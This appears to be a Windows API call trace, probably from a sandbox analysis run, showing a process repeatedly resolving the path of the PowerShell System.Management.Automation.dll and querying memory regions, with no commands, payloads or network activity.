	[0284.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.675] VirtualQuery (in: lpAddress=0x16b4c0, lpBuffer=0x16c380, dwLength=0x30 | out: lpBuffer=0x16c380*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.676] VirtualQuery (in: lpAddress=0x16b550, lpBuffer=0x16c410, dwLength=0x30 | out: lpBuffer=0x16c410*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.678] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.679] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.681] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.682] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.682] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.682] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.682] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.683] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.686] VirtualQuery (in: lpAddress=0x16b900, lpBuffer=0x16c7c0, dwLength=0x30 | out: lpBuffer=0x16c7c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.686] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.691] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.691] VirtualQuery (in: lpAddress=0x16bc30, lpBuffer=0x16caf0, dwLength=0x30 | out: lpBuffer=0x16caf0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.691] VirtualQuery (in: lpAddress=0x16bcc0, lpBuffer=0x16cb80, dwLength=0x30 | out: lpBuffer=0x16cb80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.691] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x174fea34, Data2=0x2068, Data3=0x47c4, Data4=([0]=0x9a, [1]=0xea, [2]=0x73, [3]=0x1d, [4]=0xba, [5]=0xf5, [6]=0x6b, [7]=0x8a))) returned 0x0
	[0284.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.697] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.698] VirtualQuery (in: lpAddress=0x16bcd0, lpBuffer=0x16cb90, dwLength=0x30 | out: lpBuffer=0x16cb90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
